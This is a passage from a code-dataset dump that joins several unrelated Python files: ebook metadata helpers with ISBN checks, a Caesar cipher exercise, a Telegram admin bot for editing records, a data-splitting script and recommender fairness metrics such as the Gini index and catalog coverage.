URL pointing\n to the web. Such resources are commonly referred to in OPF files.\n\n They have the interface:\n\n :member:`path`\n :member:`mime_type`\n :method:`href`\n\n '''\n\n def __init__(self, href_or_path, basedir=os.getcwd(), is_path=True):\n self._href = None\n self._basedir = basedir\n self.path = None\n self.fragment = ''\n try:\n self.mime_type = mimetypes.guess_type(href_or_path)[0]\n except:\n self.mime_type = None\n if self.mime_type is None:\n self.mime_type = 'application/octet-stream'\n if is_path:\n path = href_or_path\n if not os.path.isabs(path):\n path = os.path.abspath(os.path.join(basedir, path))\n if isinstance(path, bytes):\n path = path.decode(sys.getfilesystemencoding())\n self.path = path\n else:\n url = urllib.parse.urlparse(href_or_path)\n if url[0] not in ('', 'file'):\n self._href = href_or_path\n else:\n pc = url[2]\n if isinstance(pc, str):\n pc = pc.encode('utf-8')\n pc = polyglot.unquote(pc).decode('utf-8')\n self.path = os.path.abspath(os.path.join(basedir,\n pc.replace('/',\n os.sep)))\n self.fragment = polyglot.unquote(url[-1])\n\n def href(self, basedir=None):\n '''\n Return a URL pointing to this resource. If it is a file on the filesystem\n the URL is relative to `basedir`.\n\n `basedir`: If None, the basedir of this resource is used (see :method:`set_basedir`).\n If this resource has no basedir, then the current working directory is used as the basedir.\n '''\n if basedir is None:\n if self._basedir:\n basedir = self._basedir\n else:\n basedir = os.getcwd()\n if self.path is None:\n return self._href\n frag = '#' + urllib.parse.quote(self.fragment) if self.fragment else ''\n if self.path == basedir:\n return '' + frag\n try:\n rpath = os.path.relpath(self.path, basedir)\n except OSError: # On windows path and basedir could be on different drives\n rpath = self.path\n return urllib.parse.quote(rpath.replace(os.sep, '/')) + frag\n\n def set_basedir(self, path):\n self._basedir = path\n\n def basedir(self):\n return self._basedir\n\n def __repr__(self):\n return 'Resource(%s, %s)'%(repr(self.path), repr(self.href()))\n\n\nclass ResourceCollection(object):\n\n def __init__(self):\n self._resources = []\n\n def __iter__(self):\n for r in self._resources:\n yield r\n\n def __len__(self):\n return len(self._resources)\n\n def __getitem__(self, index):\n return self._resources[index]\n\n def __bool__(self):\n return len(self._resources) > 0\n\n def __str__(self):\n resources = map(repr, self)\n return '[%s]'%', '.join(resources)\n\n def __repr__(self):\n return str(self)\n\n def append(self, resource):\n if not isinstance(resource, Resource):\n raise ValueError('Can only append objects of type Resource')\n self._resources.append(resource)\n\n def remove(self, resource):\n self._resources.remove(resource)\n\n def replace(self, start, end, items):\n 'Same as list[start:end] = items'\n self._resources[start:end] = items\n\n @staticmethod\n def from_directory_contents(top, topdown=True):\n collection = ResourceCollection()\n for spec in os.walk(top, topdown=topdown):\n path = os.path.abspath(os.path.join(spec[0], spec[1]))\n res = Resource.from_path(path)\n res.set_basedir(top)\n collection.append(res)\n return collection\n\n def set_basedir(self, path):\n for res in self:\n res.set_basedir(path)\n\n\ndef MetaInformation(title, authors=('Unknown',)):\n ''' Convenient encapsulation of book metadata, needed for compatibility\n @param title: title or ``'Unknown'`` or a MetaInformation object\n @param authors: List of strings or []\n '''\n from ebook_converter.ebooks.metadata.book.base import Metadata\n mi = None\n if hasattr(title, 'title') and hasattr(title, 'authors'):\n mi = title\n title = mi.title\n authors = mi.authors\n return Metadata(title, authors, other=mi)\n\n\ndef check_isbn10(isbn):\n try:\n digits = tuple(map(int, isbn[:9]))\n products = [(i+1)*digits[i] for i in range(9)]\n check = sum(products)%11\n if (check == 10 and isbn[9] == 'X') or check == int(isbn[9]):\n return isbn\n except Exception:\n pass\n return None\n\n\ndef check_isbn13(isbn):\n try:\n digits = tuple(map(int, isbn[:12]))\n products = [(1 if i%2 ==0 else 3)*digits[i] for i in range(12)]\n check = 10 - (sum(products)%10)\n if check == 10:\n check = 0\n if str(check) == isbn[12]:\n return isbn\n except Exception:\n pass\n return None\n\n\ndef check_isbn(isbn):\n if not isbn:\n return None\n isbn = re.sub(r'[^0-9X]', '', isbn.upper())\n all_same = re.match(r'(\\d)\\1{9,12}$', isbn)\n if all_same is not None:\n return None\n if len(isbn) == 10:\n return check_isbn10(isbn)\n if len(isbn) == 13:\n return check_isbn13(isbn)\n return None\n\n\ndef check_issn(issn):\n if not issn:\n return None\n issn = re.sub(r'[^0-9X]', '', issn.upper())\n try:\n digits = tuple(map(int, issn[:7]))\n products = [(8 - i) * d for i, d in enumerate(digits)]\n check = 11 - sum(products) % 11\n if (check == 10 and issn[7] == 'X') or check == int(issn[7]):\n return issn\n except Exception:\n pass\n return None\n\n\ndef format_isbn(isbn):\n cisbn = check_isbn(isbn)\n if not cisbn:\n return isbn\n i = cisbn\n if len(i) == 10:\n return '-'.join((i[:2], i[2:6], i[6:9], i[9]))\n return '-'.join((i[:3], i[3:5], i[5:9], i[9:12], i[12]))\n\n\ndef check_doi(doi):\n 'Check if something that looks like a DOI is present anywhere in the string'\n if not doi:\n return None\n doi_check = re.search(r'10\\.\\d{4}/\\S+', doi)\n if doi_check is not None:\n return doi_check.group()\n return None\n","repo_name":"gryf/ebook-converter","sub_path":"ebook_converter/ebooks/metadata/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12090,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"48"} +{"seq_id":"23041914389","text":"#!/usr/bin/env python\nfrom stns.gui import SpikeDetectionGUI\nfrom glob import glob\n#file_name = '/Users/loganfickling/Downloads/Actinonin/data/11-1-20/11_1_20_LF_a.smr'\n\"\"\"\nfile_name = '/Users/loganfickling/Downloads/most recent/1_28_21_LF_d.smr'\napp = SpikeDetectionGUI(provided_path=file_name)\napp.mainloop()\"\"\"\n\nfile_names = sorted(glob('/Users/loganfickling/Downloads/Hemo*/12-13*/*.smr'))\n#file_names = sorted(glob('/Users/loganfickling/Desktop/Lingli- LPG kills and AB kills/11-03*/*.smr'))\n#file_names = glob(file_name + 'Lingli_Data_Transferred/Data/*/*.smr')\nfor file_name in file_names:\n print('Starting file {}'.format(file_name),flush=True)\n app = SpikeDetectionGUI(provided_path=file_name)\n app.mainloop()\n del(app)\n\n","repo_name":"LoganJF/stns","sub_path":"stns/examples/launchgui.py","file_name":"launchgui.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33063119426","text":"import art\n\nprint(art.logo)\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef caesar(in_text, shift_amount, encode_decode):\n out_text = \"\"\n if encode_decode == \"decode\":\n shift_amount *= -1\n for char in in_text:\n if char in alphabet:\n position = alphabet.index(char)\n new_position = position + shift_amount\n out_text += alphabet[new_position]\n else:\n out_text += char \n print(f\"Your {encode_decode}d message is {out_text}\")\n\ncipher_on = True\n\nwhile cipher_on:\n direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n text = input(\"Type your message:\\n\").lower()\n shift = int(input(\"Type the shift number:\\n\"))\n caesar(in_text=text, shift_amount=shift, encode_decode=direction)\n \n repeat = input(\"Would you like to run again? Type 'y' or 'n':\\n\")\n if repeat.lower() == 'y':\n caesar(in_text=text, shift_amount=shift, encode_decode=direction)\n elif repeat.lower() == 'n':\n print(\"Goodbye\")\n else:\n print(\"Pick a valid option.\")\n print(repeat)\n\nshift = shift % 26\n\ncaesar(in_text=text, shift_amount=shift, encode_decode=direction)","repo_name":"marshallc03/caesar-cipher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26074558525","text":"import telegram.error\nfrom telegram.ext import ContextTypes, ConversationHandler, MessageHandler, CallbackQueryHandler, CommandHandler, filters\nfrom telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup\nfrom database.db_bilder import session, Topic, Master\nfrom admin.publish_content import message_update\n\nMASTER, OPTION, ACTION, ANSWER, UPDATE = range(5)\n\n\nasync def choice_topic(update: Update, context: ContextTypes.DEFAULT_TYPE):\n if update.message.from_user.id not in [366585, 352354383]:\n await update.message.reply_text('Я тебя не знаю!')\n return ConversationHandler.END\n keyboard_topic = []\n for topic in session.query(Topic).all():\n keyboard_topic.append([InlineKeyboardButton(text=topic.title, callback_data=f'{topic.topic_id}')])\n await update.message.reply_text('Выберете топик в котором нужно изменить данные мастера:',\n reply_markup=InlineKeyboardMarkup(keyboard_topic))\n return MASTER\n\n\nasync def choice_master(update: Update, context: ContextTypes.DEFAULT_TYPE):\n target_topic_id = int(update.callback_query.data)\n keyboard_master = []\n for master in session.query(Master).where(Master.topic_master == target_topic_id).all():\n if master.company_name is not None:\n keyboard_master.append([InlineKeyboardButton(text=f'{master.company_name}: {master.phone}',\n callback_data=f'{master.master_id}')])\n elif master.name is not None:\n keyboard_master.append([InlineKeyboardButton(text=f'{master.name}: {master.phone}',\n callback_data=f'{master.master_id}')])\n await update.callback_query.edit_message_text(text='Выберете мастера:',\n reply_markup=InlineKeyboardMarkup(keyboard_master))\n return OPTION\n\n\nasync def choice_option(update: Update, context: ContextTypes.DEFAULT_TYPE):\n print(update.callback_query.data)\n master_id = int(update.callback_query.data)\n keyboard_option = [\n [InlineKeyboardButton(text='Название организации', callback_data=f'{master_id},company_name')],\n [InlineKeyboardButton(text='Имя', callback_data=f'{master_id},name')],\n [InlineKeyboardButton(text='Телефон', callback_data=f'{master_id},phone')],\n [InlineKeyboardButton(text='Telegram', callback_data=f'{master_id},telegram')],\n [InlineKeyboardButton(text='Адрес', callback_data=f'{master_id},addres')],\n [InlineKeyboardButton(text='Специализация', callback_data=f'{master_id},specialization')],\n [InlineKeyboardButton(text='Опционально', callback_data=f'{master_id},optional')]\n ]\n await update.callback_query.edit_message_text(text='Выберете категорию:',\n reply_markup=InlineKeyboardMarkup(keyboard_option))\n return ACTION\n\n\nasync def choice_action(update: Update, context: ContextTypes.DEFAULT_TYPE):\n data = update.callback_query.data\n keyboard_action = [\n [InlineKeyboardButton(text='Изменить', callback_data=f'UP,{data}'),\n InlineKeyboardButton(text='Удалить', callback_data=f'DEL,{data}')]\n ]\n await update.callback_query.edit_message_text(text='Выберете действие:', reply_markup=InlineKeyboardMarkup(keyboard_action))\n return ANSWER\n\n\nasync def action_answer(update: Update, context: ContextTypes.DEFAULT_TYPE):\n answer = update.callback_query.data.split(',')\n\n master = session.query(Master).where(Master.master_id == answer[1]).one()\n\n for key in master.__to_dict__().keys():\n if key == answer[2]:\n if answer[0] == 'DEL':\n setattr(master, key, None)\n session.commit()\n await update.callback_query.edit_message_text('Занчение успешно удалено.')\n return ConversationHandler.END\n if answer[0] == 'UP':\n setattr(master, key, 'WHAITING FOR UP DATE')\n session.commit()\n await update.callback_query.edit_message_text('Введите новое значение:')\n return UPDATE\n\n\nasync def update_data(update: Update, context: ContextTypes.DEFAULT_TYPE):\n new_data = update.message.text\n masters = session.query(Master).all()\n for master in masters:\n for key, values in master.__to_dict__().items():\n if values == 'WHAITING FOR UP DATE':\n setattr(master, key, new_data)\n session.commit()\n try:\n await message_update(update, context, master.master_id)\n except telegram.error.BadRequest:\n continue\n await update.message.reply_text('Значение успешно ��бновлено.')\n return ConversationHandler.END\n\n\nasync def stop_conversation(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text('Диалог остановлен')\n return ConversationHandler.END\n\nupdate_conversation = ConversationHandler(\n entry_points=[MessageHandler(filters.Regex('Изменить информацию о мастере'), choice_topic)],\n states={\n MASTER: [CallbackQueryHandler(callback=choice_master)],\n OPTION: [CallbackQueryHandler(callback=choice_option)],\n ACTION: [CallbackQueryHandler(callback=choice_action)],\n ANSWER: [CallbackQueryHandler(callback=action_answer)],\n UPDATE: [MessageHandler(filters.TEXT, update_data)]\n },\n fallbacks=[CommandHandler('stop', stop_conversation)], conversation_timeout=120)\n\n\n\n\n\n\n\n\n\n","repo_name":"sweetsenpai/psprof_bot","sub_path":"admin/update_masters.py","file_name":"update_masters.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"71142312466","text":"import itertools as it #combination\n\n\n#Algorithm with clo values pre-installed\n#only using a few items to show method, clo values are accurate\nwith open(\"clothes.txt\", \"r\") as myfile:\n for i, line in enumerate(myfile):\n if i == 0:\n data = line.strip()\n if i == 3:\n temp = line.strip()\n temp = float(temp[23:28])\n\nmy_clothes = eval(data)\ndef return_key(val, category):\n for garment in my_clothes[category]:\n if my_clothes[category][garment] == val:\n return garment\n#clo varies by 0.16 for every degree on average\n#at 21C clo is 1 standard room temperature\n#wind chill can be added later\n\nclo_value = 1+((21-temp)*0.16) #suggest clo value\n\nbest1 = []\n\ncombinations = it.product(*my_clothes.values())\nmylist = list(combinations)\nbest = 999\nfor i in mylist:\n count = 0\n total = 0\n newlist = []\n for j in my_clothes:\n newlist.append(my_clothes[j][i[count]])\n count += 1\n total = sum(newlist)\n if abs(clo_value - total) < best:\n best = abs(clo_value - total)\n best_list = newlist\ncount = 0\nprint(\"Best option to wear today: \")\nfor i in my_clothes:\n print(return_key(best_list[count],i))\n count = count + 1\n\n\n\n\n","repo_name":"DCJoshSP/RaspberryPi","sub_path":"clo value algorithm.py","file_name":"clo value algorithm.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44096334575","text":"import os\r\nimport sys\r\n\r\nsys.path.insert(0, os.path.join(os.getcwd()))\r\nimport glob\r\nimport argparse\r\nimport json\r\nimport numpy as np\r\nimport math\r\nimport cv2\r\nfrom natsort import natsorted\r\n\r\nimport shutil\r\n\r\n### split points are start of new folder ###\r\n\r\n### python sampleSplit.py --dir 230822 --trials 7 --split 15 85 150 ...\r\n\r\n# split에 start,end로 구성되도록 작성함.\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--dir', type=str, default=\"230822_S01_obj_01\")\r\n\r\n# --split {trial_0 start frame} {trial_0 end frame} ... {trial_n start frame} {trial_n end frame}\r\nparser.add_argument('--split', type=int, nargs='+', required=True)\r\n# --grasp 5 17 20 (recorded grasp class)\r\nparser.add_argument('--grasp', type=int, nargs='+', required=True)\r\n# --trialnum 7 7 6 (each classes trial count)\r\nparser.add_argument('--trialnum', type=int, nargs='+', required=True)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\ndef main():\r\n input_folder = args.dir\r\n # num_trials = args.trials\r\n split_list = args.split\r\n\r\n grasp_class_list = args.grasp\r\n trialnum_list = args.trialnum\r\n\r\n if not os.path.exists(os.path.join(input_folder, 'rgb')) or not os.path.exists(os.path.join(input_folder, 'depth')):\r\n raise Exception(\"no rgb, depth folder in input folder %s, check the --dir\" % (input_folder))\r\n\r\n # input_list = os.listdir(os.path.join(input_folder, 'rgb/mas'))\r\n # input_list = natsorted(input_list)\r\n\r\n if len(split_list) % 2 != 0:\r\n raise Exception(\"--split requires even number, check.\")\r\n\r\n num_trials = int(len(split_list) / 2)\r\n print(\"total trial num : \", num_trials)\r\n\r\n grasp_idx = 0\r\n trial_idx = 0\r\n\r\n for i in range(num_trials):\r\n\r\n start_idx = split_list[i * 2]\r\n end_idx = split_list[i * 2 + 1]\r\n\r\n # create grasp folder\r\n sub_grasp_name = input_folder + '_grasp_' + str(grasp_class_list[grasp_idx])\r\n sub_trial_name = 'trial_' + str(trial_idx)\r\n\r\n os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name), exist_ok=True)\r\n os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'rgb'), exist_ok=True)\r\n os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'depth'), exist_ok=True)\r\n\r\n output_rgb_path = os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'rgb')\r\n output_depth_path = os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'depth')\r\n\r\n num = 0\r\n\r\n for j in range(start_idx, end_idx):\r\n\r\n fail = 0\r\n\r\n for cam in ['mas', 'sub1', 'sub2', 'sub3']:\r\n\r\n os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'rgb', cam), exist_ok=True)\r\n os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'depth', cam), exist_ok=True)\r\n\r\n src_rgb = os.path.join(input_folder, 'rgb', cam, cam + '_' + str(j) + '.jpg')\r\n dest_rgb = os.path.join(output_rgb_path, cam, cam + '_' + str(num) + '.jpg')\r\n src_depth = os.path.join(input_folder, 'depth', cam, cam + '_' + str(j) + '.png')\r\n dest_depth = os.path.join(output_depth_path, cam, cam + '_' + str(num) + '.png')\r\n\r\n try:\r\n shutil.copy(src_rgb, dest_rgb)\r\n shutil.copy(src_depth, dest_depth)\r\n\r\n except:\r\n print('missing', src_rgb)\r\n print('missing', src_depth)\r\n fail = 1\r\n continue\r\n\r\n if fail == 0:\r\n num += 1\r\n\r\n\r\n trial_idx += 1\r\n\r\n if trial_idx == trialnum_list[grasp_idx]:\r\n trial_idx = 0\r\n grasp_idx += 1\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"UVR-WJCHO/HOnnotate_OXR","sub_path":"modules/kinectCapture/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7079300999","text":"# Aggregate of a lookup.\n\nfrom incoq.runtime import *\n\nOPTIONS(\n default_impl = 'inc',\n)\n\nR = Set()\n\nfor x in [('A', 1), ('A', 2), ('A', 3), ('B', 4), ('B', 5)]:\n R.add(x)\n\nR.remove(('B', 5))\n\nk = 'A'\nprint(sum(setmatch(R, 'bu', k)))\n","repo_name":"IncOQ/incoq","sub_path":"incoq/tests/programs/aggr/params_in.py","file_name":"params_in.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"20787573274","text":"from __future__ import annotations\nimport itertools\nimport random\nfrom abc import abstractmethod\nfrom collections import Counter, defaultdict\n\nimport pandas as pd\nimport numpy as np\nfrom typing import Dict, Set, List, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from clayrs.content_analyzer import Ratings\n from clayrs.recsys.partitioning import Split\n\nfrom clayrs.evaluation.metrics.metrics import Metric\nfrom clayrs.evaluation.utils import get_avg_pop, pop_ratio_by_user, get_item_popularity, get_most_popular_items\nfrom clayrs.evaluation.exceptions import NotEnoughUsers\nfrom clayrs.utils.const import logger\n\n\nclass FairnessMetric(Metric):\n \"\"\"\n Abstract class that generalize fairness metrics\n \"\"\"\n\n @abstractmethod\n def perform(self, split: Split):\n raise NotImplementedError\n\n\nclass GroupFairnessMetric(FairnessMetric):\n \"\"\"\n Abstract class for fairness metrics based on user groups\n\n It has some concrete methods useful for group divisions, since every subclass needs to split users into groups.\n\n Args:\n user_groups: Dict containing group names as keys and percentage of users as value, used to\n split users in groups. Users with more popular items rated are grouped into the first group, users with\n slightly less popular items rated are grouped into the second one, etc.\n \"\"\"\n\n def __init__(self, user_groups: Dict[str, float]):\n self.__user_groups = user_groups\n\n @property\n def user_groups(self):\n return self.__user_groups\n\n @abstractmethod\n def perform(self, split: Split):\n raise NotImplementedError\n\n @staticmethod\n def get_avg_pop_by_users(data: Ratings, pop_by_items: Dict, group: Set[str] = None) -> Dict[str, float]:\n r\"\"\"\n Get the average popularity for each user in the `data` parameter.\n\n Average popularity of a single user $u$ is defined as:\n\n $$\n avg\\_pop_u = \\frac{\\sum_{i \\in i_u} pop_i}{|i_u|}\n $$\n\n Args:\n data: The `Ratings` object that will be used to compute average popularity of each user\n pop_by_items: popularity for each label ('label', 'popularity')\n group: (optional) the set of users (user_id)\n\n Returns:\n Python dictionary containing as keys each user id and as values the average popularity of each user\n \"\"\"\n if group is None:\n group = data.unique_user_id_column\n group_int = data.unique_user_idx_column\n else:\n group_int = data.user_map.convert_seq_str2int(list(group))\n\n avg_pop_by_users = []\n\n for user_idx in group_int:\n user_interactions_rows = data.get_user_interactions(user_idx, as_indices=True)\n user_items = data.item_id_column[user_interactions_rows]\n\n avg_pop_by_users.append(get_avg_pop(user_items, pop_by_items))\n\n avg_pop_by_users = dict(zip(group, avg_pop_by_users))\n\n return avg_pop_by_users\n\n @staticmethod\n def split_user_in_groups(score_frame: Ratings, groups: Dict[str, float],\n pop_items: Set[str]) -> Dict[str, Set[str]]:\n r\"\"\"\n Users are split into groups based on the *groups* parameter, which contains names of the groups as keys,\n and percentage of how many user must contain a group as values. For example:\n\n groups = {'popular_users': 0.3, 'medium_popular_users': 0.2, 'low_popular_users': 0.5}\n\n Every user will be inserted in a group based on how many popular items the user has rated (in relation to the\n percentage of users we specified as value in the dictionary):\n\n * users with many popular items will be inserted into the first group\n * users with niche items rated will be inserted into one of the last groups.\n\n In general users are grouped by $Popularity\\_ratio$ in a descending order. $Popularity\\_ratio$ for a\n single user $u$ is defined as:\n\n $$\n Popularity\\_ratio_u = n\\_most\\_popular\\_items\\_rated_u / n\\_items\\_rated_u\n $$\n\n The *most popular items* are the first `pop_percentage`% items of all items ordered in a descending order by\n popularity.\n\n The popularity of an item is defined as the number of times it is rated in the `original_ratings` parameter\n divided by the total number of users in the `original_ratings`.\n\n Args:\n score_frame: the Ratings object\n groups: each key contains the name of the group and each value contains the\n percentage of the specified group. If the groups don't cover the entire user collection,\n the rest of the users are considered in a 'default_diverse' group\n pop_items: set of most popular *item_id* labels\n\n Returns:\n A python dictionary containing as keys each group name and as values the set of *user_id* belonging to\n the particular group.\n \"\"\"\n num_of_users = len(score_frame.unique_user_id_column)\n if num_of_users < len(groups):\n raise NotEnoughUsers(\"You can't split in {} groups {} users! \"\n \"Try reducing number of groups\".format(len(groups), num_of_users))\n\n for percentage_chosen in groups.values():\n if not 0 < percentage_chosen <= 1:\n raise ValueError('Incorrect percentage! Valid percentage range: 0 < percentage <= 1')\n total = sum(groups.values())\n if total > 1:\n raise ValueError(\"Incorrect percentage! Sum of percentage is > than 1\")\n elif total < 1:\n raise ValueError(\"Sum of percentage is < than 1! Please add another group or redistribute percentages \"\n \"among already defined group to reach a total of 1!\")\n\n pop_ratio_by_users = pop_ratio_by_user(score_frame, most_pop_items=pop_items)\n pop_ratio_by_users = sorted(pop_ratio_by_users, key=pop_ratio_by_users.get, reverse=True)\n\n groups_dict: Dict[str, Set[str]] = {}\n last_index = 0\n percentage = 0.0\n for group_name in groups:\n percentage += groups[group_name]\n group_index = round(num_of_users * percentage)\n if group_index == 0:\n logger.warning('Not enough rows for group {}! It will be discarded'.format(group_name))\n else:\n groups_dict[group_name] = set(pop_ratio_by_users[last_index:group_index])\n last_index = group_index\n return groups_dict\n\n\nclass GiniIndex(FairnessMetric):\n r\"\"\"\n The Gini Index metric measures inequality in recommendation lists. It's a system wide metric, so only its\n result it will be returned and not those of every user.\n The metric is calculated as such:\n\n $$\n Gini_{sys} = \\frac{\\sum_i(2i - n - 1)x_i}{n\\cdot\\sum_i x_i}\n $$\n\n Where:\n\n - $n$ is the total number of distinct items that are being recommended\n - $x_i$ is the number of times that the item $i$ has been recommended\n\n A perfectly equal recommender system should recommend every item the same number of times, in which case the Gini\n index would be equal to 0. The more the recsys is \"disegual\", the more the Gini Index is closer to 1\n\n If the 'top_n' parameter is specified, then the Gini index will measure inequality considering only the first\n *n* items of every recommendation list of all users\n\n Args:\n top_n: it's a cutoff parameter, if specified the Gini index will be calculated considering only the first\n 'n' items of every recommendation list of all users. Default is None\n \"\"\"\n\n def __init__(self, top_n: int = None):\n self.__top_n = top_n\n\n def __str__(self):\n name = \"Gini\"\n if self.__top_n:\n name += \" - Top {}\".format(self.__top_n)\n\n return name\n\n def __repr__(self):\n return f'GiniIndex(top_n={self.__top_n})'\n\n def perform(self, split: Split):\n def gini(x: List):\n \"\"\"\n Inner method which given a list of values, calculates the gini index\n\n Args:\n x: list of values of which we want to measure inequality\n \"\"\"\n # The rest of the code requires numpy arrays.\n x = np.asarray(x)\n sorted_x = np.sort(x)\n n = len(x)\n cumx = np.cumsum(sorted_x, dtype=float)\n # The above formula, with all weights equal to 1 simplifies to:\n return (n + 1 - 2 * np.sum(cumx) / cumx[-1]) / n\n\n predictions = split.pred\n\n score_dict = {'user_id': [], str(self): []}\n\n prediction_items = predictions.item_id_column\n if self.__top_n is not None:\n\n prediction_items = []\n\n for user_idx in predictions.unique_user_idx_column:\n user_interactions_indices = predictions.get_user_interactions(user_idx,\n head=self.__top_n,\n as_indices=True)\n\n user_items = predictions.item_id_column[user_interactions_indices]\n prediction_items.append(user_items)\n\n prediction_items = itertools.chain.from_iterable(prediction_items)\n\n coun = Counter(prediction_items)\n\n result = gini(list(coun.values()))\n\n score_dict['user_id'].append('sys')\n score_dict[str(self)].append(result)\n\n return pd.DataFrame(score_dict)\n\n\nclass PredictionCoverage(FairnessMetric):\n r\"\"\"\n The Prediction Coverage metric measures in percentage how many distinct items are being recommended in relation\n to all available items. It's a system wise metric, so only its result it will be returned and not those of every\n user.\n The metric is calculated as such:\n\n $$\n Prediction Coverage_{sys} = (\\frac{|I_p|}{|I|})\\cdot100\n $$\n\n Where:\n\n - $I$ is the set of all available items\n - $I_p$ is the set of recommended items\n\n The $I$ must be specified through the 'catalog' parameter\n\n Check the 'Beyond Accuracy: Evaluating Recommender Systems by Coverage and Serendipity' paper for more\n\n Args:\n catalog: set of item id of the catalog on which the prediction coverage must be computed\n \"\"\"\n\n def __init__(self, catalog: Set[str]):\n self.__catalog = set(str(item_id) for item_id in catalog)\n\n def __str__(self):\n return \"PredictionCoverage\"\n\n def __repr__(self):\n return f'PredictionCoverage(catalog={self.__catalog})'\n\n @property\n def catalog(self):\n return self.__catalog\n\n def _get_covered(self, pred: Ratings):\n \"\"\"\n Private function which calculates all recommended items given a catalog of all available items (specified in\n the constructor)\n\n Args:\n pred: Ratings object containing recommendation lists of all users\n\n Returns:\n Set of distinct items that have been recommended that also appear in the catalog\n \"\"\"\n pred_items = set(pred.unique_item_id_column)\n return pred_items.intersection(self.catalog)\n\n def perform(self, split: Split) -> pd.DataFrame:\n prediction = {'user_id': [], str(self): []}\n\n pred = split.pred\n\n covered_items = self._get_covered(pred)\n\n percentage = (len(covered_items) / len(self.__catalog)) * 100\n coverage_percentage = np.round(percentage, 2)\n\n prediction['user_id'].append('sys')\n prediction[str(self)].append(coverage_percentage)\n\n return pd.DataFrame(prediction)\n\n\nclass CatalogCoverage(PredictionCoverage):\n r\"\"\"\n The Catalog Coverage metric measures in percentage how many distinct items are being recommended in relation\n to all available items. It's a system wide metric, so only its result it will be returned and not those of every\n user. It differs from the Prediction Coverage since it allows for different parameters to come into play. If no\n parameter is passed then it's a simple Prediction Coverage.\n The metric is calculated as such:\n\n $$\n Catalog Coverage_{sys} = (\\frac{|\\bigcup_{j=1...N}reclist(u_j)|}{|I|})\\cdot100\n $$\n\n Where:\n\n - $N$ is the total number of users\n - $reclist(u_j)$ is the set of items contained in the recommendation list of user $j$\n - $I$ is the set of all available items\n\n The $I$ must be specified through the 'catalog' parameter\n\n The recommendation list of every user ($reclist(u_j)$) can be reduced to the first *n* parameter with the\n top-n parameter, so that catalog coverage is measured considering only the most highest ranked items.\n\n With the 'k' parameter one could specify the number of users that will be used to calculate catalog coverage:\n k users will be randomly sampled and their recommendation lists will be used. The formula above becomes:\n\n $$\n Catalog Coverage_{sys} = (\\frac{|\\bigcup_{j=1...k}reclist(u_j)|}{|I|})\\cdot100\n $$\n\n Where:\n\n - $k$ is the parameter specified\n\n Obviously 'k' < N, else simply recommendation lists of all users will be used\n\n Check the 'Beyond Accuracy: Evaluating Recommender Systems by Coverage and Serendipity' paper and\n page 13 of the 'Comparison of group recommendation algorithms' paper for more\n\n Args:\n catalog: set of item id of the catalog on which the prediction coverage must be computed\n top_n: it's a cutoff parameter, if specified the Catalog Coverage will be calculated considering only the first\n 'n' items of every recommendation list of all users. Default is None\n k: number of users randomly sampled. If specified, k users will be randomly sampled across all users and only\n their recommendation lists will be used to compute the CatalogCoverage\n \"\"\"\n\n def __init__(self, catalog: Set[str], top_n: int = None, k: int = None):\n super().__init__(catalog)\n self.__top_n = top_n\n self.__k = k\n\n def __str__(self):\n # If none of the parameter is passed, then it's simply a PredictionCoverage\n name = \"CatalogCoverage (PredictionCov)\"\n\n if self.__top_n:\n name = \"CatalogCoverage\"\n name += \" - Top {}\".format(self.__top_n)\n if self.__k:\n name = \"CatalogCoverage\"\n name += \" - {} sampled users\".format(self.__k)\n\n return name\n\n def __repr__(self):\n return f'CatalogCoverage(catalog={self.catalog}, top_n={self.__top_n}, k={self.__k})'\n\n def _get_covered(self, pred: Ratings):\n\n # IF k is passed, then we choose randomly k users and calc catalog coverage\n # based on their predictions. We check that k is < n_user since if it's the equal\n # or it's greater, then all predictions generated for all user must be used\n user_list = pred.unique_user_idx_column\n if self.__k is not None and self.__k < len(pred.unique_user_id_column):\n\n user_list = random.choices(user_list, k=self.__k)\n\n prediction_items = []\n\n for user_idx in user_list:\n user_interactions_indices = pred.get_user_interactions(user_idx,\n head=self.__top_n,\n as_indices=True)\n\n user_items = pred.item_id_column[user_interactions_indices]\n prediction_items.append(user_items)\n\n prediction_items = list(itertools.chain.from_iterable(prediction_items))\n covered_items = set(prediction_items).intersection(self.catalog)\n\n return covered_items\n\n\nclass DeltaGap(GroupFairnessMetric):\n r\"\"\"\n 